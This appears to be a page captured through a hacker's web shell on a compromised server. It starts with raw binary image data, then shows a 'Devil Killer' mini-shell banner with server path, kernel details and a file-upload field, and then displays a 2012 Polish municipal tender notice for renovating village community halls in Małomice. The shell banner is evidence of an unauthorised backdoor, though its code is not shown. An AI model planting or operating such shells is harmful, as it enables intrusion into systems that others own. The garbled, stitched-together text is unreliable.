JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120323/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120323/92338-N-2012.html

<p class="kh_header"><b>Małomice: REWITALIZACJA ŚWIETLIC WIEJSKICH WE WSI CHICHY, LUBIECHÓW, ŚLIWNIK I BOBRZANY-REMONT ŚWIETLIC WIEJSKICH W CHICHACH I W LUBIECHOWIE- ETAP I</b><br>
<b>Numer ogłoszenia: 92338 - 2012; data zamieszczenia: 23.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Małomice , Plac Konstytucji 3 Maja 1, 67-320 Małomice, woj. lubuskie, tel. 068 3769027, faks 068 3769051 w. 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.malomice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REWITALIZACJA ŚWIETLIC WIEJSKICH WE WSI CHICHY, LUBIECHÓW, ŚLIWNIK I BOBRZANY-REMONT ŚWIETLIC WIEJSKICH W CHICHACH I W LUBIECHOWIE- ETAP I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3. PRZEDMIOT  ZAMÓWIENIA OBEJMUJE:
3.1. Remont świetlicy wiejskiej w Chichach gm. Małomice, działka nr 311, a w szczególności wykonanie: 
1) ROBÓT  BUDOWLANYCH, W TYM : 
a) Rozbiórek i demontażu elementów budowlanych : 
-Wykucia z muru ościeżnic, krat, balustrad i innych elementów stalowych,
- Demontażu drzwi i wykucia  z muru ościeżnic drzwiowych,
- Demontażu okien ,
- Demontażu posadzek cementowych, płytek ceramicznych, pvc,
- Rozbiórki ścian murowanych z cegły i kominów,
- Rozbiórki różnych elementów wewnętrznych i zewnętrznych 
- Rozbiórki  pieca kaflowego,
- Rozebrania pokrycia dachowego z papy; 
b) Robót  fundamentowych i izolacyjno- przeciwwilgociowych :  
- Wzmocnienia narożnika budynku na długości 2 metrów w obu kierunkach ściany,
- Izolacji przeciwwilgociowej fundamentów
- Izolacji na ścianach fundamentowych  zewnętrznych z folii kubełkowej; 
c) Robót  murowych i konstrukcyjnych: 
- Nowych ścianek działowych i konstrukcyjnych murowanych, z bloczków  
  gazobetonowych (norma PN-B-19301: 1997) odmiany 400 gr 6 i 12 cm na  
  zaprawie  klejowej,
- Kominów wentylacyjnych : przemurowania kominów ponad dachem z cegły 
  klinkierowej wg. opinii kominiarskiej, przewodów wentylacyjnych poziomych i 
  pionowych,
- Zamurowań otworów okiennych i drzwiowych; 
d) Nadproży drzwiowych żelbetowych prefabrykowanych; 
e) Tynków i okładzin ścian :  
- Wewnętrznych, okładzin ścian w pomieszczeniach mokrych (sanitarnych);
- Tynków wewnętrznych  i okładzin ścian w pomieszczeniach suchych;     
- Sufitów podwieszonych;
f) Robót podłogowych i posadzkowych:
- Podłóg z wykładziną obiektową
- Podłóg z płytek gres na gruncie
- Podłóg z płytek gres na stopie;
g) Malowania :
- Ścian w pomieszczeniach mokrych(sanitarnych)
- Ścian w pomieszczeniach suchych
- Wykonania tynku dekoracyjnego mozaikowego;
h) Stolarki okiennej i drzwiowej: 
- Okien z PCV wraz z  parapetami wewnętrznymi z PCV i parapetami zewnętrznymi  
  z  blachy powlekanej- w ilości zgodnie z projektem architektury
- Drzwi zewnętrznych i wewnętrznych - w ilości zgodnie z przedmiarem robót
- Ościeżnic;
i) Pokrycia dachu: 
- Pokrycia dachu dwuspadowego blachodachówką 
- przybicia kontrłat i łat dachowych
- wykonania  pokrycia z blachodachówki
- Pokrycia dachu jednospadowego papą termozgrzewalną
- zerwania istniejącego pokrycia papowego
- demontażu deskowania  
- impregnacji istniejącej konstrukcji drewnianej
- montażu płyty OSB III
- pokrycia dachu 2x papą termozgrzewalną; 
j) Rynien, rur spustowych i obróbek blacharskich : 
- Rynien z blachy tytan-cynk  o śr. 150 mm, haków stalowych do rynien 
- Rur spustowych z blachy tytan-cynk o śr. 120 mm, haków stalowych do rur 
  spustowych
- Opierzenia i obróbek blacharskich z blachy tytan-cynk gr. 0,6 mm
- Płotków przeciwśniegowych ze wspornikami; 
k) Elewacji : 
- Naprawy ścian
- Podkładów pod tynki szlachetne
- Tynków szlachetnych;
l) Nawierzchni z kostki betonowej:       
- Opasek wokół budynku wraz z montażem ścieków odprowadzających wodę 
  deszczową
2) ROBÓT  SANITARNYCH: 
a) Wewnętrznej  instalacji wodociągowej :  
- Demontażu wewnętrznej instalacji wodociągowej 
- Poprowadzenia instalacji do nowoprojektowanych urządzeń
- Izolacji rurociągów i wykonania obudów
- Montażu elektrycznych podgrzewaczy c.w.u;
b) Wewnętrznej instalacji kanalizacji (sanitarnej). 
3.2. Remont świetlicy wiejskiej w Lubiechowie gm. Małomice, działka nr 94, a w 
  szczególności wykonanie: 
1) ROBÓT  BUDOWLANYCH , W TYM : 
a) Rozbiórek i demontażu elementów budowlanych : 
- Wykucia z muru ościeżnic, krat, balustrad i innych elementów stalowych,
- Demontażu drzwi i wykucia z muru ościeżnic drzwiowych,
- Demontażu okien,
- Rozbiórki posadzek cementowych, płytek ceramicznych, pvc,
- Rozbiórki ścian murowanych z cegły i kominów,
- Rozbiórki różnych elementów wewnętrznych i zewnętrznych 
- Rozbiórki pieca kaflowego,
- Rozebrania pokrycia dachowego z papy;
b) Robót  fundamentowych  i izolacyjno- przeciwwilgociowych :   
- Wzmocnienia narożnika budynku na długości 2 metrów w obu kierunkach ściany,
- Izolacji przeciwwilgociowej fundamentów
- Izolacji na ścianach fundamentowych  zewnętrznych z folii kubełkowej; 
c) Robót  murowych  i konstrukcyjnych : 
- Przemurowania ścian
- Kominów wentylacyjnych : przemurowania kominów ponad dachem z cegły pełnej 
   kl. 250 wg. opinii kominiarskiej, przewodów wentylacyjnych poziomych i 
   pionowych; 
d) Nadproży drzwiowych żelbetowych prefabrykowanych; 
e) Tynków i okładzin ścian : 
- Wewnętrznych, okładzin ścian w pomieszczeniach mokrych(sanitarnych);
- Tynków wewnętrznych  i okładzin ścian w pomieszczeniach suchych;     
- Sufitów podwieszonych;
f) Robót podłogowych i posadzkowych :
- Podłóg z płytek gres układanych na istniejącym podłożu;
g) Malowania :
- Ścian w pomieszczeniach mokrych(sanitarnych)
- Ścian w pomieszczeniach suchych
- Wykonania tynku dekoracyjnego mozaikowego;
h) Stolarki okiennej i drzwiowej:
- Okien z PCV wraz z  parapetami wewnętrznymi z PCV i parapetami zewnętrznymi  
  z blachy powlekanej- w ilości zgodnie z projektem architektury
- Drzwi zewnętrznych  i wewnętrznych - w ilości zgodnie z przedmiarem robót
- Ościeżnic;
i) Pokrycia dachu: 
- Pokrycia  dachu dwuspadowego blachodachówką 
- przybicia kontrłat i łat dachowych
- pokrycia z blachodachówki,
- Pokrycia dachu jednospadowego papą termozgrzewalną
   - zerwania istniejącego pokrycia papowego
   - demontażu deskowania  
   - impregnacji istniejącej konstrukcji drewnianej
    - montażu  płyty OSB III
    - pokrycia dachu 2x papą termozgrzewalną; 
j) Rynien, rur spustowych i obróbek  blacharskich :
- Rynien z blachy tytan-cynk  o śr. 150 mm, haków stalowych do rynien 
- Rur spustowych z blachy tytan-cynk o śr. 120 mm, haków stalowych do rur 
  spustowych
- Opierzenia i obróbek  blacharskich  z blachy tytan-cynk gr. 0,6 mm
- Płotków  przeciwśniegowych  ze wspornikami; 
k) Elewacji - wykonania  tynków zewnętrznych :  
- Naprawy ścian
- Podkładów pod tynki szlachetne
- Wykonania tynków szlachetnych;
l) Nawierzchni z kostki betonowej :       
- Opasek wokół budynku wraz z montażem ścieków odprowadzających
  wodę deszczową
2) ROBOT  SANITARNYCH 
a) Wewnętrznej instalacji wodociągowej : 
- Demontażu wewnętrznej instalacji wodociągowej 
- Poprowadzenia instalacji do nowoprojektowanych urządzeń
- Izolacji rurociągów i wykonania obudów
- Montażu elektrycznych podgrzewaczy c.w.u;
b) Wewnętrznej instalacji kanalizacji (sanitarnej). 

3.3. INFORMACJE DODATKOWE  NIEZBĘDNE DO WYKONANIA PRZEDMIOTU
ZAMÓWIENIA. WYKONAWCA JEST ZOBOWIĄZANY DO: 
1) Wykonania i zamontowania dwóch tablic, zgodnie z wytycznymi  Instytucji  
   Zarządzającej w zakresie informacji i promocji dla beneficjentów : 
a) tablicę informacyjną w trakcie trwania robót budowlanych, iż przedmiot 
    zamówienia   został  dofinansowany przez  Unię Europejską, 
b) tablicę pamiątkową  po zakończeniu robót budowlanych.  
Na  obu tablicach winny znaleźć się :  logo programu i emblemat Unii Europejskiej.  Tablica informacyjna powinna zawierać elementy: 
      - emblemat Unii Europejskiej, 
      - logo programu, 
      - odniesienie do Europejskiego Funduszu Rolnego Rozwoju Obszarów 
        Wiejskich. Informacje te powinny zajmować co najmniej 25 % powierzchni 
        tablicy.
2) Prace budowlane należy wykonać zgodnie z obowiązującymi przepisami BHP, 
   Prawem  budowlanym, dokumentacją techniczną  sporządzoną przez Pracownię 
   Projektową MM-PROJEKT ul. Aleja Wojska Polskiego 98, 68-200 Żary, wiedzą i 
   sztuką  budowlaną  i pod  nadzorem osób posiadających odpowiednie 
   uprawnienia budowlane. 
3) Wykonawca powinien zadbać o to aby obszar prowadzenia robót był ogrodzony 
   oraz wyraźnie oznakowany, a w miejscach szczególnie niebezpiecznych by 
   zostały umieszczone znaki informacyjne o rodzaju zagrożenia oraz aby 
   Wykonawca  zastosował środki zabezpieczające przed skutkami zagrożenia.
   Teren budowy należy zaopatrzyć w tablicę informacyjną wraz ogłoszeniem   
   zawierającym dane dotyczące  bezpieczeństwa i ochrony zdrowia.
4) Wykonawca winien zadbać o należyte składowanie i zabezpieczenie  na terenie   
   obiektu  materiałów  niezbędnych do realizacji przedmiotu zamówienia. 
5) Wszelki gruz, czy inne odpady powstałe w takcie prac remontowych muszą 
   zostać przez Wykonawcę  wywiezione i utylizowane na Jego koszt (wliczony do  
   ogólnej ceny  brutto  wykonania przedmiotu zamówienia), zgodnie z wymogi 
   ustawy o odpadach (Dz. U. t.j.z 2010r. Nr 185,poz.1234 z późn.zm.).
6) Użyte do realizacji przedmiotu zamówienia materiały muszą posiadać stosowane
   atesty, certyfikaty lub aprobaty techniczne zezwalające na stosowanie w 
   budownictwie.
7) W trakcie robót ziemnych- po dokonaniu odkrywki - Wykonawca jest 
   zobowiązany do niezwłocznego powiadomienia projektanta o istniejących  
   warunkach  gruntowo-wodnych celem skorygowania założeń przyjętych w 
   projekcie.

3.4. Uwaga! 
  Wszędzie tam, gdzie  w dokumentacji technicznej Projektant  użył, w celu 
  precyzyjnego opisania przedmiotu zamówienia,   znaków towarowych, nazw 
  producentów i dystrybutorów, opisom takim towarzyszą wyrazy lub równoważny..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.44.30.00-4, 45.26.19.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 8.1. Zamawiający  żąda od Wykonawców wniesienie wadium.
8.2. Wadium w wysokości 4400,00 zł, słownie: cztery tysiące czterysta złotych, 
      należy wnieść przed upływem terminu składania ofert. 
8.3. Wadium należy wnieść w jednej z niżej  wymienionych  form: 
1) pieniądzu; 
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo 
    kredytowej, z tym że poręczenie kasy jest zawsze  poręczeniem pieniężnym; 
3) gwarancjach bankowych; 
4) gwarancjach ubezpieczeniowych; 
5) poręczeniach udzielanych przez podmioty, o których mowa w art.6b  ust.5 pkt  
    2 ustawy z dnia 9 listopada 2000r o utworzeniu Polskiej Agencji Rozwoju  
    Przedsiębiorczości (Dz.U. Nr 109, poz.1158, z późn.zm). 
8.4.Wadium wnoszone w  pieniądzu wpłaca się przelewem na rachunek bankowy 
     wskazany przez Zamawiającego nr 69 9657 0007 0010 0100 3795 0005  i  
     przechowuje się na tym rachunku. 
8.5.Wadium wniesione w pieniądzu uznaje się za wniesione w sposób prawidłowy, 
     gdy kwota wadium zostanie zaksięgowana  na wskazanym koncie 
     Zamawiającego nie  później, jak przed upływem terminu składania ofert. Kopię 
     dowodu wpłaty wadium Wykonawca dołącza do oferty. 
8.6.Dokument potwierdzający wniesienie wadium  w innej formie niż w pieniądzu 
     winien być złożony w oryginale (odrębnie poza ofertą)  przed terminem 
     składania ofert.
8.7.Wykonawca, którego  oferta nie będzie zabezpieczona wadium wniesionym we 
     właściwej formie, terminie i kwocie zostanie wykluczony z przedmiotowego  
     postępowania.
8.8.Zamawiający zwraca  wadium wszystkim Wykonawcom niezwłocznie po 
     wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem 
     Wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
8.9.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zwraca 
     się  wadium niezwłocznie po zawarciu umowy w sprawie zamówienia 
     publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.  
8.10.Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który
      wycofał ofertę przed upływem terminu składania ofert. 
8.11.Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z 
      odsetkami   wynikającymi z umowy rachunku bankowego, na którym było ono  
      przechowywane,  pomniejszone o koszty prowadzenia rachunku bankowego 
      oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany 
      przez Wykonawcę. 
8.12.Zamawiający, nie później niż na 7 dni przed upływem ważności wadium, 
      wzywa  Wykonawców, pod rygorem wykluczenia z postępowania, do 
      przedłużenia ważności wadium albo wniesienia nowego wadium na okres 
      niezbędny do zabezpieczenia  postępowania do  zawarcia umowy. Jeżeli 
      odwołanie wniesiono po wyborze oferty  najkorzystniejszej, wezwanie kieruje 
      się jedynie do Wykonawcy, którego ofertę  wybrano jako najkorzystniejszą. 
8.13.Zamawiający żąda ponownego wniesienia wadium przez wykonawcę,
       któremu    zwrócono wadium na podstawie opisanej w punkcie 8.8 ogłoszenia, 
       jeżeli w wyniku  rozstrzygnięcia  odwołania jego oferta została wybrana jako 
       najkorzystniejsza. Wykonawca wnosi  wadium w terminie  określonym przez 
       Zamawiającego.
8.14.Zamawiający zatrzymuje wadium wraz z odsetkami jeżeli Wykonawca w 
      odpowiedzi na wezwanie (o uzupełnienie oświadczeń, dokumentów lub 
      pełnomocnictw, zgodnie z  art.26 ust.3 i art.25 ust.1 Ustawy  Prawo zamówień 
      publicznych) nie złożył  dokumentów lub  oświadczeń czy też pełnomocnictw, 
      chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
8.15.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego 
      oferta została wybrana : 
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach  
    określonych w ofercie; 
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z 
    przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)w  zakresie  posiadania  przez Wykonawcę uprawnień do wykonywania określonej    działalności lub czynności, typu koncesja, zezwolenie, licencja,  Zamawiający nie żąda od Wykonawcy  potwierdzenia  posiadania uprawnień do wykonywania działalności, gdyż  przepisy prawa nie nakładają  obowiązku posiadania  takowych uprawnień;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b) w zakresie  posiadania wiedzy i doświadczenia - Zamawiający uzna za  spełniającego  ten  wymóg  tego Wykonawcę,  który w okresie ostatnich pięciu  lat 
przed upływem  składania ofert, jeżeli okres prowadzenia działalności jest  krótszy -w tym okresie - wykonał co najmniej 1 robotę  budowlaną polegającą na remoncie budynku /lub budowie, przebudowie/ w zakresie robót z branży  budowlanej i sanitarnej  o  wartości  adekwatnej do przedmiotu zamówienia, określonej przez Wykonawcę w złożonej ofercie. Na potwierdzenie spełnienia w/w  warunku 
Wykonawca złoży wraz z ofertą dokument określony w sekcji III punkt 4.1 pozycja 1 ogłoszenia, z załączonymi do niego dokumentami  potwierdzającymi, że  wymienione  roboty zostały wykonane  zgodnie z  zasadami  sztuki  budowlanej i  prawidłowo ukończone.  Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie. Wykonawca może polegać na  wiedzy i doświadczeniu innych podmiotów,  niezależnie od charakteru prawnego łączących go z nimi stosunków.  Wykonawca w  takiej sytuacji zobowiązany jest udowodnić Zamawiającemu,  iż będzie dysponował  zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji  niezbędnych  zasobów na okres korzystania z nich przy wykonywaniu  zamówienia;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>c) w zakresie dysponowania osobami zdolnymi do wykonania zamówienia-
Zamawiający uzna za spełniającego te wymogi tego Wykonawcę, który będzie 
dysponował co najmniej jedną osobą uprawnioną do pełnienia funkcji technicznych w budownictwie- kierowanie  robotami  budowlanymi w specjalności konstrukcyjno-budowlanej lub dysponującą innymi uprawnieniami umożliwiającymi wykonywanie tych samych czynności, do wykonywania których uprawniają w  aktualnym stanie prawnym w/w specjalności. Na potwierdzenie spełnienia tego warunku Wykonawca  złoży  wraz z  ofertą dokument określony w sekcji III punkt 4.1 pozycja 2 ogłoszenia. Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie.  W zakresie dysponowania oraz osobami zdolnymi  do wykonania  zamówienia Wykonawca może polegać na zasobach  innych podmiotów, niezależnie od 
charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował  zasobami   niezbędnymi do realizacji  zamówienia, w  szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji  niezbędnych  zasobów na okres korzystania z nich przy wykonywaniu zamówienia, oraz składając  dokumenty określone w sekcji III punkt 4.1. pozycja 2 ogłoszenia;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>d) w zakresie sytuacji ekonomicznej i finansowej  Zamawiający uzna za spełniającego te wymogi tego Wykonawcę, który  będzie  ubezpieczony   od odpowiedzialności cywilnej w  zakresie prowadzonej działalności  związanej z przedmiotem zamówienia na kwotę nie mniejszą jak 200 000,00 zł (dwieście tysięcy złotych). Na potwierdzenie spełnienia w/w warunku Wykonawca złoży wraz z ofertą dokument określony w  sekcji III. punkt 4.1. pozycja 4  ogłoszenia. Wykonawcy występujący wspólnie powyższy warunek mogą spełnić łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

